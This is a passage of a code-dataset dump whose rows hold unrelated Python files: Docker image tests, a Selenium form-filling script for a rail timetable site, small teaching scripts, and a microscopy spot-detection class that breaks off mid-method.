index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
12,900 | f3f8e9c9fac57bff57e4242271a1b132386f4d31 | # Copyright [2018-2020] Peter Krenesky
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from unittest import mock
from docker.errors import NotFound as DockerNotFound
from ixian.utils.filesystem import pwd
from ixian_docker.tests.conftest import TEST_IMAGE_NAME, build_test_image
from ixian_docker.modules.docker.utils.images import (
image_exists,
push_image,
pull_image,
image_exists_in_registry,
delete_image,
parse_registry,
build_image_if_needed,
build_image,
)
from ixian_docker.tests import event_streams
class TestImageExists:
    """
    Tests for image existing locally
    """

    def test_image_does_not_exist(self):
        """image_exists returns False when the image is absent from the local daemon."""
        # delete images to ensure no leakage from other tests
        delete_image(TEST_IMAGE_NAME, force=True)
        assert not image_exists(TEST_IMAGE_NAME)

    def test_image_exists(self, test_image):
        """image_exists returns True once the test_image fixture has built the image."""
        assert image_exists(TEST_IMAGE_NAME)
class TestBuildImage:
    """
    Tests for building images with build_image / build_test_image.
    """

    def test_build_image(self):
        # build explicitly (no test_image fixture here) so both the build and the
        # teardown path are exercised; clean up in finally so failures don't leak.
        tag = f"{TEST_IMAGE_NAME}:latest"
        assert not image_exists(TEST_IMAGE_NAME)
        assert not image_exists(tag)
        try:
            build_test_image(tag=tag)
            assert image_exists(TEST_IMAGE_NAME)
            assert image_exists(tag)
        finally:
            delete_image(tag, force=True)
            delete_image(TEST_IMAGE_NAME, force=True)
            assert not image_exists(TEST_IMAGE_NAME)
            assert not image_exists(tag)

    def test_build_image_default_context(self, mock_docker_environment):
        """
        When context=None then the PWD is used for the context
        """
        build_image("Dockerfile.test", TEST_IMAGE_NAME, context=None)
        mock_docker_environment.images.build.assert_called_with(
            dockerfile="Dockerfile.test", path=pwd(), tag=TEST_IMAGE_NAME
        )

    def test_build_image_custom_tag(self):
        """Building with a custom tag does not also tag the image as "latest"."""
        tag = f"{TEST_IMAGE_NAME}:custom"
        assert not image_exists(TEST_IMAGE_NAME)
        assert not image_exists(tag)
        try:
            build_test_image(tag=tag)
            assert image_exists(tag)
            # image_exists only returns True for "latest" if no tag is given
            assert not image_exists(TEST_IMAGE_NAME)
        finally:
            delete_image(tag, force=True)
            delete_image(TEST_IMAGE_NAME, force=True)
            assert not image_exists(TEST_IMAGE_NAME)
            assert not image_exists(tag)
class TestDeleteImage:
    """
    Tests for removing images from the local docker daemon.
    """

    def test_delete_image(self, test_image):
        """delete_image returns True and the image is gone afterwards."""
        assert image_exists(TEST_IMAGE_NAME)
        assert delete_image(TEST_IMAGE_NAME)
        assert not image_exists(TEST_IMAGE_NAME)

    def test_force_delete_image(self, test_image):
        """force=True also deletes the image."""
        assert image_exists(TEST_IMAGE_NAME)
        assert delete_image(TEST_IMAGE_NAME, force=True)
        assert not image_exists(TEST_IMAGE_NAME)

    def test_delete_image_that_does_not_exist(self):
        # delete returns false if no image was deleted
        assert not image_exists(TEST_IMAGE_NAME)
        assert not delete_image(TEST_IMAGE_NAME)
        assert not delete_image(TEST_IMAGE_NAME, force=True)

    def test_delete_latest(self, test_image):
        """
        The image tagged with latest may be deleted using that tag.
        """
        tag = f"{TEST_IMAGE_NAME}:latest"
        assert image_exists(TEST_IMAGE_NAME)
        assert image_exists(tag)
        assert delete_image(tag, force=True)
        assert not image_exists(TEST_IMAGE_NAME)
        assert not image_exists(tag)

    def test_delete_image_by_wrong_tag(self, test_image):
        """
        Only images with the matching tag are deleted if one is specified
        """
        tag = f"{TEST_IMAGE_NAME}:wrong_tag"
        assert image_exists(TEST_IMAGE_NAME)
        assert not delete_image(tag, force=True)
        assert image_exists(TEST_IMAGE_NAME)
        # now delete using that tag, both tags will be gone because it's the same image.
        build_test_image(tag=tag)
        assert image_exists(TEST_IMAGE_NAME)
        assert image_exists(tag)
        assert delete_image(tag, force=True)
        assert not image_exists(TEST_IMAGE_NAME)
        assert not image_exists(tag)
class TestBuildImageIfNeeded:
    """
    Tests for build_image_if_needed: an image is built only when it is not
    available locally, and (unless pull=False) not available in the registry.
    """

    # default tag used when no explicit tag is passed
    default_image = f"{TEST_IMAGE_NAME}:latest"
    # kwargs expected on every default build call
    default_call_kwargs = dict(
        dockerfile="Dockerfile", path="/opt/ixian_docker", tag=default_image
    )

    def test_image_exists_local(self, mock_docker_environment):
        """
        If image exists locally, nothing is done.
        """
        build_image_if_needed(TEST_IMAGE_NAME)
        mock_docker_environment.images.build.assert_not_called()

    def test_image_exists_registry(self, mock_docker_environment):
        """
        If doesn't exist locally but exists in the repository, it will be pulled.
        """
        # local lookup raises NotFound -> falls through to registry pull
        mock_docker_environment.images.get.side_effect = DockerNotFound("testing")
        build_image_if_needed(TEST_IMAGE_NAME)
        mock_docker_environment.api.pull.assert_called_with(
            TEST_IMAGE_NAME, "latest", decode=True, stream=True
        )
        mock_docker_environment.images.build.assert_not_called()

    def test_image_exists_registry_pull_not_found(self, mock_docker_environment):
        """
        If the image exists in the registry, but for some reason pull returns DockerNotFound, then
        fall back to building. This shouldn't happen in practice, but it's coded defensively just
        in case of some weirdness.
        """
        mock_docker_environment.images.get.side_effect = DockerNotFound("testing")
        mock_docker_environment.api.pull.side_effect = DockerNotFound("testing")
        build_image_if_needed(TEST_IMAGE_NAME)
        mock_docker_environment.api.pull.assert_called_with(
            TEST_IMAGE_NAME, "latest", decode=True, stream=True
        )
        mock_docker_environment.images.build.assert_called_with(**self.default_call_kwargs)

    def test_image_exists_registry_no_pull(self, mock_docker_environment):
        """
        Don't check for a remote image or pull it if pull=False. Even if the image exists remotely
        a new image will be built.
        """
        mock_docker_environment.images.get.side_effect = DockerNotFound("testing")
        build_image_if_needed(TEST_IMAGE_NAME, pull=False)
        mock_docker_environment.images.build.assert_called_with(**self.default_call_kwargs)

    def test_image_exists_local_and_registry(self, mock_docker_environment):
        """
        If image exists locally, nothing is done.
        """
        build_image_if_needed(TEST_IMAGE_NAME)
        mock_docker_environment.images.build.assert_not_called()

    def test_image_does_not_exist(self, mock_docker_environment):
        """
        If image doesn't exist anywhere then build.
        :return:
        """
        mock_docker_environment.images.get.side_effect = DockerNotFound("testing")
        mock_docker_environment.images.get_registry_data.side_effect = DockerNotFound("mocked")
        build_image_if_needed(TEST_IMAGE_NAME)
        mock_docker_environment.images.build.assert_called_with(**self.default_call_kwargs)
        # pull=True makes no difference when the registry lookup also misses
        build_image_if_needed(TEST_IMAGE_NAME, pull=True)
        mock_docker_environment.images.build.assert_called_with(**self.default_call_kwargs)

    def test_force_with_local_image(self, mock_docker_environment):
        """
        if force=True then image will always build
        """
        build_image_if_needed(TEST_IMAGE_NAME, force=True)
        mock_docker_environment.images.build.assert_called_with(**self.default_call_kwargs)

    def test_force_with_registry_image(self, mock_docker_environment):
        """
        if force=True then image will always build
        """
        mock_docker_environment.images.get.side_effect = DockerNotFound("testing")
        build_image_if_needed(TEST_IMAGE_NAME, force=True)
        mock_docker_environment.images.build.assert_called_with(**self.default_call_kwargs)

    def test_force_with_local_and_registry_image(self, mock_docker_environment):
        """
        if force=True then image will always build
        """
        build_image_if_needed(TEST_IMAGE_NAME, force=True)
        mock_docker_environment.images.build.assert_called_with(**self.default_call_kwargs)

    def test_unknown_registry(self, mock_docker_environment):
        """
        If the registry isn't configured, always build
        """
        mock_docker_environment.images.get.side_effect = DockerNotFound("testing")
        build_image_if_needed("unknown.registry.com/foo/bar")
        mock_docker_environment.images.build.assert_called_with(
            dockerfile="Dockerfile",
            tag="unknown.registry.com/foo/bar:latest",
            path="/opt/ixian_docker",
        )

    def test_recheck_fails(self):
        """
        After pulling a re-check is run. If it fails the image is built.
        """
        # TODO(review): placeholder test -- implement or mark with a skip marker
        # so the suite does not report it as an error.
        raise NotImplementedError

    def test_custom_tag(self, mock_docker_environment):
        """An explicit tag argument is used for the local, registry, and build lookups."""
        tag = f"{TEST_IMAGE_NAME}:custom_tag"
        mock_docker_environment.images.get.side_effect = DockerNotFound("testing")
        mock_docker_environment.images.get_registry_data.side_effect = DockerNotFound("mocked")
        build_image_if_needed(TEST_IMAGE_NAME, "custom_tag")
        mock_docker_environment.images.build.assert_called_with(
            dockerfile="Dockerfile", path="/opt/ixian_docker", tag=tag
        )
        build_image_if_needed(TEST_IMAGE_NAME, "custom_tag", pull=True)
        mock_docker_environment.images.build.assert_called_with(
            dockerfile="Dockerfile", path="/opt/ixian_docker", tag=tag
        )
class TestParseRegistry:
    """
    Tests for extracting the registry hostname from an image name.
    """

    def test_parse_repository(self):
        """Image names carrying an explicit hostname resolve to that hostname."""
        cases = [
            ("foo.bar.com/test/image", "foo.bar.com"),
            ("foo.bar.com/test/image", "foo.bar.com"),
            ("foo.bar.com/test_image", "foo.bar.com"),
            ("192.168.1.1/test/image", "192.168.1.1"),
            ("192.168.1.1/test_image", "192.168.1.1"),
            ("foo.bar.com", "foo.bar.com"),
            ("192.168.1.1", "192.168.1.1"),
        ]
        for image, registry in cases:
            assert parse_registry(image) == registry

    def test_parse_no_registry(self):
        """
        If there is no hostname in the image name then the default repository is used.
        """
        names = [
            "image_name_without_hostname",
            "image_name_without_hostname/foo",
            "image_name_without_hostname/foo/bar",
            "imagenamewithouthostname/foo/bar",
            "imagenamewithouthostname/foo",
            "imagenamewithouthostname",
        ]
        for image in names:
            assert parse_registry(image) == "docker.io"
class TestImageExistsInRegistry:
    """
    Tests for image existing on remote registry
    """

    def test_image_exists(self, mock_docker_environment):
        """The mocked environment reports registry data by default -> True."""
        assert image_exists_in_registry(TEST_IMAGE_NAME) is True

    def test_image_does_not_exist(self, mock_docker_environment):
        """A NotFound from get_registry_data maps to False, not an exception."""
        mock_docker_environment.images.get_registry_data.side_effect = DockerNotFound("mocked")
        assert image_exists_in_registry(TEST_IMAGE_NAME) is False
class TestPush:
    """
    Tests for pushing image to registry
    """

    def test_push(self, mock_docker_environment, snapshot, capsys):
        """
        Test a successful push
        """
        push_image(TEST_IMAGE_NAME)
        # progress output is snapshot-tested rather than asserted line-by-line
        out, err = capsys.readouterr()
        snapshot.assert_match(out)

    def test_push_already_pushed(self, mock_docker_environment, snapshot, capsys):
        """
        Test a successful push where all layers already exist on the registry
        """
        mock_docker_environment.api.push = mock.Mock(
            return_value=event_streams.PUSH_ALREADY_PRESENT
        )
        push_image(TEST_IMAGE_NAME)
        out, err = capsys.readouterr()
        snapshot.assert_match(out)

    def test_push_tag(self, mock_docker_environment, snapshot, capsys):
        """
        Test pushing with an explicit tag
        """
        mock_docker_environment.api.push = mock.Mock(
            return_value=event_streams.PUSH_SUCCESSFUL_CUSTOM_TAG
        )
        push_image(TEST_IMAGE_NAME, "custom_tag")
        out, err = capsys.readouterr()
        snapshot.assert_match(out)

    def test_push_error(self, mock_docker_environment, snapshot, capsys):
        """
        Test a push with an error
        """
        # simulate a registry auth failure event stream
        mock_docker_environment.api.push = mock.Mock(
            return_value=event_streams.ECR_PUSH_AUTH_FAILURE
        )
        push_image(TEST_IMAGE_NAME, "custom_tag")
        out, err = capsys.readouterr()
        snapshot.assert_match(out)

    def test_push_silent(self, mock_docker_environment, snapshot, capsys):
        """
        Test a successful push with silent=True
        """
        push_image(TEST_IMAGE_NAME, silent=True)
        out, err = capsys.readouterr()
        snapshot.assert_match(out)

    def test_push_error_and_silent(self, mock_docker_environment, snapshot, capsys):
        """
        Test a push with an error while silent=True
        """
        mock_docker_environment.api.push = mock.Mock(
            return_value=event_streams.ECR_PUSH_AUTH_FAILURE
        )
        push_image(TEST_IMAGE_NAME, "custom_tag", silent=True)
        out, err = capsys.readouterr()
        snapshot.assert_match(out)
class TestPull:
    """
    Tests for pulling image from registry
    """

    def test_pull(self, mock_docker_environment, snapshot, capsys):
        """
        Test a successful pull
        """
        mock_client = mock_docker_environment
        pull_image(TEST_IMAGE_NAME)
        mock_client.api.pull.assert_called_with(
            TEST_IMAGE_NAME, "latest", stream=True, decode=True
        )
        out, err = capsys.readouterr()
        snapshot.assert_match(out)

    def test_pull_silent(self, mock_docker_environment, snapshot, capsys):
        """
        Test a successful pull with silent=True
        """
        mock_client = mock_docker_environment
        pull_image(TEST_IMAGE_NAME, silent=True)
        # silent pulls do not stream/decode progress events
        mock_client.api.pull.assert_called_with(
            TEST_IMAGE_NAME, "latest", stream=False, decode=False
        )
        out, err = capsys.readouterr()
        snapshot.assert_match(out)

    def test_pull_tag(self, mock_docker_environment, snapshot, capsys):
        """
        Test pulling with an explicit tag
        """
        mock_client = mock_docker_environment
        pull_image(TEST_IMAGE_NAME, "custom_tag")
        mock_client.api.pull.assert_called_with(
            TEST_IMAGE_NAME, "custom_tag", stream=True, decode=True
        )
        out, err = capsys.readouterr()
        snapshot.assert_match(out)

    def test_pull_error(self):
        """
        Test a pull with an error
        """
        # TODO(review): placeholder test -- implement or mark with a skip marker.
        raise NotImplementedError

    def test_pull_error_and_silent(self, mock_docker_environment, snapshot, capsys):
        """
        Test a pull with an error while silent=True
        """
        # TODO(review): placeholder test -- implement or mark with a skip marker.
        raise NotImplementedError
|
12,901 | e8f77166e61e705f2b7437a27521d7899a838c26 | #Copying Lists
# Copying lists: list() (like a full slice) produces an independent copy.
my_pizzas = ['cheese', 'sausage', 'pepperoni']
friends_pizza = list(my_pizzas)  # independent copy of my_pizzas

# Extend each list on its own after the copy was taken.
my_pizzas.append('ham')
friends_pizza.append('pineapple')

# The loops below show that the two lists changed separately.
print('My favorite pizzas are: ')
for pizza in my_pizzas:
    print(pizza)
print('\nMy friends favorite pizzas are: ')
for pizza in friends_pizza:
    print(pizza)
12,902 | 25273c9840da609c4b415ab899aa92df24538bcc | from selenium import webdriver
# NOTE(review): this reads as a Selenium IDE export; the By / ActionChains
# imports and the `vars` / wait_for_window() boilerplate the exported steps
# rely on were missing, so the script raised NameError before doing anything.
# They are restored below following the standard Selenium IDE pytest export.
import time

from selenium.webdriver.common.by import By
from selenium.webdriver.common.action_chains import ActionChains

# Raw string: the old plain literal contained invalid escape sequences (\p, \S, \c).
driver = webdriver.Chrome(r'D:\GitRoot\pros\Selenium\chromedriver\chromedriver_win32_104\chromedriver.exe')

# Storage used by the Selenium IDE style "vars" steps below.
vars = {}


def wait_for_window(timeout=2000):
    """Return the handle of a window opened since vars["window_handles"] was stored."""
    time.sleep(timeout / 1000)
    wh_now = driver.window_handles
    wh_then = vars["window_handles"]
    if len(wh_now) > len(wh_then):
        return set(wh_now).difference(set(wh_then)).pop()


driver.get("https://www.thsrc.com.tw/")
# Hover the current carousel banner, then reset the pointer to the page origin.
element = driver.find_element(By.CSS_SELECTOR, ".slick-current .pic-l")
actions = ActionChains(driver)
actions.move_to_element(element).perform()
element = driver.find_element(By.CSS_SELECTOR, "body")
actions = ActionChains(driver)
actions.move_to_element(element, 0, 0).perform()
# Open the survey/schedule iframe.
driver.find_element(By.ID, "a_irs").click()
driver.switch_to.frame(1)
# Departure / arrival stations (option label text taken verbatim from the site).
driver.find_element(By.ID, "select_location01").click()
dropdown = driver.find_element(By.ID, "select_location01")
dropdown.find_element(By.XPATH, "//option[. = 'ๅฐๅ']").click()
driver.find_element(By.ID, "select_location02").click()
dropdown = driver.find_element(By.ID, "select_location02")
dropdown.find_element(By.XPATH, "//option[. = 'ๅฐไธญ']").click()
# Pick the departure date from the calendar widget.
driver.find_element(By.ID, "Departdate02").click()
driver.find_element(By.CSS_SELECTOR, "tr:nth-child(6) > .day:nth-child(6)").click()
driver.find_element(By.ID, "toPortalTimeTable").click()
# Recorded chevron clicks adjusting the departure time, kept as exported.
driver.find_element(By.CSS_SELECTOR, "td:nth-child(1) .fa-chevron-up").click()
driver.find_element(By.CSS_SELECTOR, "td:nth-child(1) .fa-chevron-up").click()
element = driver.find_element(By.CSS_SELECTOR, "td:nth-child(1) .fa-chevron-up")
actions = ActionChains(driver)
actions.double_click(element).perform()
driver.find_element(By.CSS_SELECTOR, "td:nth-child(1) .fa-chevron-up").click()
driver.find_element(By.CSS_SELECTOR, "td:nth-child(1) .fa-chevron-up").click()
driver.find_element(By.CSS_SELECTOR, "td:nth-child(1) .fa-chevron-up").click()
driver.find_element(By.CSS_SELECTOR, "td:nth-child(1) .fa-chevron-up").click()
driver.find_element(By.CSS_SELECTOR, ".col-lg-10").click()
# NOTE(review): "VRC5" is a hard-coded captcha value recorded at export time;
# it will not match a live captcha -- this step needs a manual/solver step.
driver.find_element(By.ID, "securityCode").click()
driver.find_element(By.ID, "securityCode").send_keys("VRC5")
# Remember the open windows, submit, then switch to the newly opened one.
vars["window_handles"] = driver.window_handles
driver.find_element(By.ID, "SubmitButton").click()
vars["win1111"] = wait_for_window(2000)
driver.switch_to.window(vars["win1111"])
driver.find_element(By.CSS_SELECTOR, "span:nth-child(7) .uk-radio").click()
driver.find_element(By.NAME, "SubmitButton").click()
driver.close() |
12,903 | 20b541099d848c0fe17096583879a56051cb5d2f | from django.apps import AppConfig
class FcsolutionsConfig(AppConfig):
name = 'fcsolutions'
|
12,904 | acf992b6462d6ced6d18a603dd539ed33b236f9c | #######################################################################################
# 2.3] Matching strings with shell wildcard patterns
# * Goal: use the same wildcard patterns as the Unix shell for text matching (e.g. *.py)
#
# Use fnmatch() and fnmatchcase() from the fnmatch module.
# (Author's note: having never used a Unix shell, this chapter is skipped.)
####################################################################################### |
12,905 | a3ac723e89e3cfb60b6fc3589b573bda34ec0142 | import csv
# Load the crop -> cultivation-cost lookup table from CSV.
# Column 0: crop name, column 1: cost (parsed as int).
# NOTE(review): assumes the CSV has no header row -- a header line would raise
# ValueError on int(); confirm against the data file.
predict={}
with open('data/cost-of-cultivation.csv') as csvfile:
    reader = csv.reader(csvfile)
    for x in reader:
        predict[x[0]]=int(x[1])
def bestcrop(budget, costs=None):
    """Print the name of every crop whose cultivation cost fits within ``budget``.

    :param budget: maximum cost (inclusive) for a crop to be printed.
    :param costs: optional mapping of crop name -> cost; defaults to the
        module-level ``predict`` table loaded from the CSV (backward compatible).
    :return: None, results are printed.

    Bug fix: the original built an inverted cost -> name dict, so crops that
    shared the same cultivation cost overwrote each other and only one of them
    was (repeatedly) printed. Iterating the mapping directly reports each
    affordable crop exactly once, preserving the insertion order and the
    inclusive ``cost <= budget`` rule of the original.
    """
    if costs is None:
        costs = predict
    for crop, cost in costs.items():
        if cost <= budget:
            print(crop)
bestcrop(10000) |
12,906 | fb3e06ea86743260811f6fb24cb86038f8ec4a62 | from skimage import io
from .filters import *
from .vizu import *
from .fitters import Gaussian, Mixture
from .segmentation import *
from skimage.transform import downscale_local_mean, resize
from .utils import *
from inspect import signature
from skimage import exposure
from skimage import img_as_ubyte, img_as_uint
import matplotlib
from .spotdetector import *
from sklearn.metrics.pairwise import euclidean_distances
from sklearn.mixture import GaussianMixture
from itertools import product
import warnings
from .spot import Spot
import time
from copy import deepcopy
# warnings.simplefilter()
# @chain_methods
@extend_class(show_image)
@extend_class(show_detection_profile)
@extend_class(show_spots)
@extend_class(show_model)
class FQimage(object):
"""
Main class for spot detection and image filtering, including SNR metric and detection profile analysis.
Images are shaped in the right order: (x, y, z).
The class instance has to hold both raw and filtered image. As of now, each image, once loaded, weights around
350 Mb, and once filtered, around 700Mb.
MIP views of an image have therefore been moved to the plotting methods (MIP is recomputed at each view, which
slows down the process but lights down images because it is not an attribute).
TODO: DONE finally re-order image dimension in the right order. mistake fixed which came from matplotlib.
"""
def __init__(self, verbose=1, data=None, shape=(512, 512, 35)):
"""
Main class for spot detection and image filtering, including SNR metric and detection profile analysis.
Images are shaped in the right order: (x, y, z).
The class instance has to hold both raw and filtered image. As of now, each image, once loaded, weights around
350 Mb, and once filtered, around 700Mb.
MIP views of an image have therefore been moved to the plotting methods ( MIP is recomputed at each view, which
slows down the process but lights down images because it is not an attribute).
- DEPRECATED Methods in the class are chained what means they have to be called in a precised order (filter before detecting
spots for instance). The chain_methods decorator ensures that, plus automatically calls methods of the chain
which have not been called yet.
- Vizualisation methods have been moved to vizu.py file but are attached thanks to extend_class decorator.
Images can be either loaded here (through the data argument) or in the load method.
Attributes:
image_raw : non filtered image. Three dimensional but accepts two-dimensional adta as well.
image_filtered : filtered image. Filters are defined in the Filter module.
spots : list of Spot instances, each spot being a tuple of coordinates, a list of parameters for the
associated model.
SNR : Signal to Noise Ratio. Defined as
Sqrt(Sum((spot_signal - surrounding_mean)**2) / n) / std(surrounding_signal
*for each spot*.
_verbose : verbose
cells : nucleis (obtained through segment method).
name : path, has to be a unique identifier of each image.
mixture_model sum of all the spot models, it can be used to rebuild a modeled version of the image,
is quite time-consuming however.
background : background signal, simply defined as moving average on the signal with kernel much larger than
the usual spot width.
mask : ?
:param verbose: whether to print or not progress bars and summaries of the evolution.
shape: target shape for the image, data will be reshaped only if bigger.
:return: None
"""
if shape is not None and data is not None:
if data.shape != shape:
data = resize(data, shape, mode='constant')
self.image_raw = data
self.image_filtered = None
self.spots = []
self.SNR = None
self._verbose = verbose
self.name = None
self.mixture_model = None
self.background = None
self.mask = None
def load(self, path, shape=(1024, 1024, 35), dtype='uint16'):
"""
Loads the image from disk, returns image with axis in the natural order (deep last).
Data format should be numpy.uint8. Time complexity goes square if numpy.uint16, especially for segmentation.
Opera data format: uint16, 6.45e-8 m/pixel
Hilo data format: uint16, 2.66e-7 m/pixel
Downscaling ratio: 4.0.
For speed matters, the image is downscaled using local mean. Therefore, the image is resized using integer factors
and the reiszed image might not be exactly the asked shape.
Data format is converted to dtype (uint8) by default for the sack of speed.
TODO Might be interesting to investigate numpy.load with memorymap in the future.
TODO DONE MIP might me moved into 'show' methods for better optimization over memory charge.
:param path, shape, dtype: path of the file. shape to resize the image if necessary. dtype of the target image.
:return: None
"""
valid_dtypes = ['uint8', 'uint16']
if dtype not in valid_dtypes:
raise ValueError('dtype should be either one of %s' % ', '.join(valid_dtypes))
im = io.imread(path)
im = numpy.rollaxis(im, 0, 3)
if im.shape != shape and shape is not None:
factors = tuple(map(lambda z: int(z[0] / z[1]), zip(im.shape, shape)))
if any([f > 1 for f in factors]):
# im = resize(im, shape, mode='constant')
im = downscale_local_mean(im, factors=factors).astype(im.dtype)
# if 'conf' in path.lower():
else:
warnings.warn('Target shape is not a multiple below initial shape')
with warnings.catch_warnings():
warnings.simplefilter('ignore')
if dtype == 'uint8' and im.dtype != numpy.uint8:
im = img_as_ubyte(im)
if dtype == 'uint16' and im.dtype != numpy.uint16:
im = img_as_uint(im)
self.image_raw = im
self.name = path
    def filter(self, op=GaussianFilter):
        """
        Filters by first convolving the background with a gaussian filter.
        Then subtract the obtained image from the original and finally re-filter with another
        Gaussian filter with a variance 10 times smaller. Variance specified in utils module.
        TODO To be implemented: DOG, LocalMean, and more.
        :param op: operator taken from filters.py file. Must be an instance of the Filter class. (i.e. implementing
        'convolve' or 'apply' methods.
        :return: None, the image_filtered attribute is loaded with the filtered image.
        """
        if self._verbose > 0:
            print("Filtering...")
        # Import from utils specified params (sigma_bgd / sigma_spots).
        params = get_filtering_params()
        # NOTE(review): image_raw is unsigned (uint8/uint16, see load()); this
        # subtraction wraps around wherever the background estimate exceeds the
        # raw value -- confirm that is intended, or cast to a signed type first.
        negative = self.image_raw - op(sigma=params['sigma_bgd']).convolve(self.image_raw)
        self.image_filtered = op(sigma=params['sigma_spots']).convolve(negative)
def _detect_spots(self, detector=LocalMax, **kwargs):
"""
DEPRECATED, replaced by detect_and_fit for simplicity and speed issues.
Detect spots with a specified detector (from the spotdetector.py module)
and the detection params from utils module.
Spots are identified by their position, i.e. 'x.y.z'.
:param detector: an instance of the SpotDetector or subclass, i.e. implementing a 'locate' method returning
array of positions of spots.
:return: None, the spots attribute is a dict filled with spots (name i.e. their position 'x.y.z' and their
actual positions.)
"""
if self._verbose > 0:
print("Detecting...", end="")
spots = detector(**kwargs).locate(self.image_filtered)
# Spots are identified by their position:
self.spots = [Spot(tuple(s)) for s in spots]
if self._verbose > 0:
print('%i spots detected.' % len(self.spots))
def get_sigma_psf(self):
"""
TODO Should return the variance of the PSF in order to compute correctly the filters of the fiter method.
"""
pass
def fit_spots(self, spot_model=Mixture, kind='individual'):
"""
DEPRECATED Jump to next paragraph.
This method goes through all the detected spots and fit a specified spot_model separately to each of them.
TODO DONE If a model can not be safely fit to the spot, then the spot is deprecated and deleted from the spots list.
Spot_models are built in the fitters module.
Extract_cube comes from utils module.
A GMM from sklearn mixture model is fit to the dataset. To do so (and avoid too large dataset) the pixel values
are bucketized:
X_train will be constituted of [x, y, z] times image_raw[x, y, z] for all the x, y, z. For obvious complexity
reasons only points neighboring a spot are added to X_train are their value do not flow between 0 and 2^16-1
because that would make a huge X_train.
Even if this seems counter productive, it is much faster to do this rather than fitting a mixture of GMM
density functions on the image because by doing as below, I can focus on spots whereas the other way I would
have to fit the ENTIRE space which takes ages.
Here we get a better estimation of the spots position (local peak max is free of computation time).
:param spot_model: an instance of the SpotModel class or children from the fitters.py module, i.e. implementing
a 'fit' method and showing a 'method' attribute.
"""
model = spot_model()
# print(model)
# if model.kind == 'individual':
#
# loop = self.spots
#
# # to_delete = []
# if self._verbose > 0:
# loop = tqdm.tqdm(loop, desc="Fitting spot models...")
#
# to_delete = []
# for k in loop:
# spot = self.image_filtered[extract_cube(point=k.coordinates, side=get_focus_size())]
# centers = [get_focus_size() // 2, ] * 3
# results = model.fit(centers=centers, data=spot)
#
# # Filter spots for which a model could not be fit.
# if results:
# model.params = list(k.coordinates) + list(model.params)
# k.model = model
# else:
# to_delete.append(k)
#
# # Filter spots and store in dict
# self.spots = [k for k in self.spots if k not in to_delete]
#
# self.mixture_model = lambda x, y, z: sum([s.model.function(*s.model.params)(x, y, z) for s in self.spots])
if kind == 'collective':
mask = numpy.zeros(self.image_filtered.shape)
for s in self.spots:
mask[ellipse_in_shape(mask.shape, s.coordinates, (10, 10, 5))] = 1
mask = mask.astype(bool)
results = model.fit(centers=[s.coordinates for s in self.spots], data=self.image_filtered, mask=mask)
if results:
params = model.params.reshape(-1, 4)
for s, p in zip(self.spots, params):
s.model = Gaussian()
s.model.params = p
print(model.params)
centers = [s.coordinates for s in self.spots]
backgrounds = [[0], ] * len(self.spots)
print(centers)
print(backgrounds)
self.mixture_model = model.function
if self._verbose > 0:
time.sleep(0.1)
print('%i spots fit.' % len(self.spots))
def detect_and_fit(self,
detector=DoG,
min_sigma=1,
max_sigma=5,
sigma_ratio=1.3,
threshold='GMM',
background_kernel=25,
return_profile=False):
"""
TODO
"""
valid = ['DoG', 'LoG', 'DoH']
if detector.__name__ not in valid:
raise ValueError('Detector not adapted, use one of DoG, LoG, DoH.')
if self._verbose > 0:
print("Detecting...", end="", flush=True)
blobs = detector(
min_sigma=min_sigma,
max_sigma=max_sigma,
sigma_ratio=sigma_ratio,
threshold=threshold).locate(self.image_raw)
if blobs.shape[0] == 0:
if self._verbose > 0:
print('%i spots detected.' % blobs.shape[0])
self.spots = []
return
self.spots = [Spot(tuple(c.astype(int))) for c in blobs[:, :3]]
if self._verbose > 0:
print('%i spots detected.' % blobs.shape[0])
sigmas = blobs[:, 3]
if self._verbose > 0:
print("Fitting...", end="", flush=True)
# plans = [self.image_raw[:, :, z].astype(numpy.uint16) for z in range(0, self.image_raw.shape[-1], 10)]
warnings.simplefilter('ignore')
# background = numpy.stack(
# [rank.median(p, background_kernel) for p in plans])
# background = numpy.mean(background_stack, axis=0)
for s, p in zip(self.spots, sigmas):
s.model = Gaussian()
ex = self.image_raw[extract_cube(s.coordinates, side=background_kernel)]
background = numpy.mean(ex)
p = itertools.chain(s.coordinates,
[self.image_raw[s.coordinates] - background],
[p, p, p])
p_names = signature(s.model.function).parameters.keys()
s.model.params = {k: v for (k, v) in zip(p_names, p)}
warnings.simplefilter('default')
if self._verbose > 0:
print("fit.")
funcs = [s.model.function(*s.model.params.values()) for s in self.spots]
self.mixture_model = lambda x, y, z: sum([f(x, y, z) for f in funcs]) # + background[numpy.round(z / 10), x, y]
if return_profile:
intensities = [self.image_raw[t.coordinates] for t in self.spots]
bins = [i * numpy.iinfo(self.image_raw.dtype).max / 255 for i in range(0, 255)]
counts, _ = numpy.histogram(intensities, bins)
return numpy.cumsum(counts[::-1])[::-1]
def compute_snr(self, boxplot=False):
"""
The SNR is computed by comparing:
- value at any point which does not belong to a spot zone. A spot zone being defined
as the minimum distance between two spots (cf spot detector).
TODO DONE In the future, it might be interesting to define a 'non-spotted' zone as the ensemble of points which
are distant of more than 2*sigma_spot to the considered spot.
- average amplitude of the spots in the cell.
TODO Refactor the terrible loop in every ways.
TODO Check the division: what happens when dist is odd ?
In details, the code is fairly ugly but seems fine as the scope is reduced to the region of interest (cube
surrounding a spot) and thereafter, all the computations are performed in this reduced scope. This speeded up the
computations by roughly a e04 factor. Using a cKDTree was too slow as well. It might be worthy investigating the
combination of both (i.e. a cKDTREE within a reduced scope).
:param min_distance_appart_spots: the minimum distance for considering two spots appart. Should be greater than
utils.get_focus_size()
:return: list of snrs and their mean.
Debugging: if snrs is empty (traceback to numpy.mean) then probably no is computed for any spot. Check sigma
ceiling (beginning of for loop) and min_distance.
"""
if len(self.spots) == 0:
print('No ARN detected.')
return
# Prune blobs with overlapping vicinities:
blobs = numpy.array(
[list(map(s.model.params.__getitem__, ['center_x', 'center_y', 'center_z', 'width_x'])) for s in
self.spots])
pruned_blobs = prune_blobs(blobs, overlap=0.)
# Compute background
loop = pruned_blobs
if self._verbose > 0:
loop = tqdm.tqdm(loop, desc="Computing SNRs for each spot")
snrs = []
shape = self.image_raw.shape
for s in loop:
# Work locally:
